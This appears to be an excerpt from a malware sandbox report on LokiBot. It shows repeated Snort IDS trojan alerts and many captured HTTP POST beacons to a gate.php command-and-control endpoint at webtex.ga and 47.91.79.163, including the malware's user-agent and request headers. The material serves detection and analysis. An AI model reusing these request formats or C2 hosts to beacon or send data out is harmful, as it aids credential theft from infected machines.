              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49786 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49786 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49786 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49786 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49786
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49788 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49788 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49788 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49788 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49788 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49788
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49789 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49789 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49789 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49789 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49789 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49789
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49790 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49790 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49790 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49790 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49790 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49790
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49791 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49791 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49791 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49791 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49791 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49791
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49792 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49792 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49792 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49792 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49792 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49792
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49793 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49793 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49793 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49793 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49793 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49793
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49794 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49794 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49794 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49794 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49794 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49794
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49795 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49795 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49795 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49795 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49795 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49795
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49796 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49796 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49796 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49796 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49796 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49796
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49797 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49797 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49797 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49797 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49797 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49797
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49798 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49798 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49798 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49798 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49798 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49798
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49799 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49799 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49799 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49799 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49799 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49799
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49800 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49800 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49800 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49800 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49800 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49800
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49801 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49801 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49801 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49801 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49801 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49801
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49802 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49802 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49802 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49802 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49802 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 47.91.79.163:80 -> 192.168.2.3:49802
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49805 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49805 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49805 -> 47.91.79.163:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49805 -> 47.91.79.163:80
              Found C&C like URL patternShow sources
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 190Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
              Source: global trafficHTTP traffic detected: POST /ibiki/gate.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: webtex.gaAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 31904CD2Content-Length: 163Connection: close
